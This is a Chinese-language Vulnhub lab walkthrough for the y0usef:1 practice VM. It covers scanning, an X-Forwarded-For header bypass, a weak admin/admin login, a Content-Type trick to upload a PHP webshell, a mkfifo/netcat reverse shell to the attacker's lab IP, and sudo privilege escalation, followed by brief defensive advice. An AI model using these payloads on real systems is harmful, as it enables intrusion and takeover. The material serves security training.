Vulnhub y0usef: 1
字数 938 2025-08-15 21:33:46

Vulnhub靶机y0usef:1渗透测试教学文档

靶机基本信息

  • 难度等级:简单
  • 下载链接:https://www.vulnhub.com/entry/y0usef-1,624/
  • 特点:需要一定想象力,操作相对容易

环境准备

  1. 将靶机镜像导入虚拟化平台
  2. 确保攻击机(Kali Linux)与靶机在同一网段

渗透测试步骤

1. 主机发现

nmap 192.168.56.0/24
  • 发现靶机IP: 192.168.56.105

2. 端口扫描与服务识别

nmap -sV -p- -A 192.168.56.105
  • 开放端口:
    • 22/tcp - SSH
    • 80/tcp - HTTP

3. Web应用枚举

目录扫描

dirb http://192.168.56.105
  • 初始扫描可能无结果

使用dirsearch发现301重定向:

dirsearch -u http://192.168.56.105

绕过访问限制

  • 添加请求头实现重定向:
    X-Forwarded-For: 127.0.0.1
    
  • 使用Burp Suite拦截请求并添加该头部

4. 登录页面渗透

  • 发现登录页面
  • 使用Burp Suite进行暴力破解
  • 使用top100字典
  • 成功破解凭证:
    • 用户名:admin
    • 密码:admin

5. 文件上传漏洞利用

  1. 尝试上传PHP webshell
  2. 发现直接上传.php文件被过滤
  3. 使用Burp修改上传请求:
    • 修改Content-Type为image/png
  4. 上传成功路径:
    http://192.168.56.105/adminstration/upload/files/16127499112.php
    
  5. 使用哥斯拉(Godzilla)连接webshell

6. 获取反向Shell

  1. 通过webshell执行命令:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 1234>/tmp/f
  1. 在攻击机监听:
nc -lvnp 1234
  1. 升级为交互式shell:
python -c 'import pty;pty.spawn("/bin/bash")'

7. 本地信息收集

  1. 在/home目录发现user.txt
  2. 内容为base64编码,解码后获得:
    • 用户名:yousef
    • 密码:yousef123

8. SSH稳定连接

ssh yousef@192.168.56.105

9. 权限提升

  1. 检查sudo权限:
sudo -l
  1. 发现yousef可以执行所有命令
  2. 直接提权:
sudo su
  1. 或:
sudo -i

10. 获取最终flag

  1. 进入/root目录
  2. 查看flag文件并解码

关键知识点总结

  1. 主机发现:使用nmap进行网络扫描
  2. 目录枚举:当标准字典无效时尝试不同工具
  3. 访问控制绕过:X-Forwarded-For头部利用
  4. 弱凭证利用:常见默认凭证测试
  5. 文件上传绕过:Content-Type修改技术
  6. 反向Shell建立:使用nc建立稳定连接
  7. 权限提升:sudo权限滥用

防御建议

  1. 禁用默认/弱凭证
  2. 实施严格的文件上传验证
  3. 限制sudo权限
  4. 监控异常HTTP头部
  5. 定期进行安全审计
Vulnhub靶机y0usef:1渗透测试教学文档 靶机基本信息 难度等级:简单 下载链接:https://www.vulnhub.com/entry/y0usef-1,624/ 特点:需要一定想象力,操作相对容易 环境准备 将靶机镜像导入虚拟化平台 确保攻击机(Kali Linux)与靶机在同一网段 渗透测试步骤 1. 主机发现 发现靶机IP: 192.168.56.105 2. 端口扫描与服务识别 开放端口: 22/tcp - SSH 80/tcp - HTTP 3. Web应用枚举 目录扫描 初始扫描可能无结果 使用dirsearch发现301重定向: 绕过访问限制 添加请求头实现重定向: 使用Burp Suite拦截请求并添加该头部 4. 登录页面渗透 发现登录页面 使用Burp Suite进行暴力破解 使用top100字典 成功破解凭证: 用户名:admin 密码:admin 5. 文件上传漏洞利用 尝试上传PHP webshell 发现直接上传.php文件被过滤 使用Burp修改上传请求: 修改Content-Type为image/png 上传成功路径: 使用哥斯拉(Godzilla)连接webshell 6. 获取反向Shell 通过webshell执行命令: 在攻击机监听: 升级为交互式shell: 7. 本地信息收集 在/home目录发现user.txt 内容为base64编码,解码后获得: 用户名:yousef 密码:yousef123 8. SSH稳定连接 9. 权限提升 检查sudo权限: 发现yousef可以执行所有命令 直接提权: 或: 10. 获取最终flag 进入/root目录 查看flag文件并解码 关键知识点总结 主机发现 :使用nmap进行网络扫描 目录枚举 :当标准字典无效时尝试不同工具 访问控制绕过 :X-Forwarded-For头部利用 弱凭证利用 :常见默认凭证测试 文件上传绕过 :Content-Type修改技术 反向Shell建立 :使用nc建立稳定连接 权限提升 :sudo权限滥用 防御建议 禁用默认/弱凭证 实施严格的文件上传验证 限制sudo权限 监控异常HTTP头部 定期进行安全审计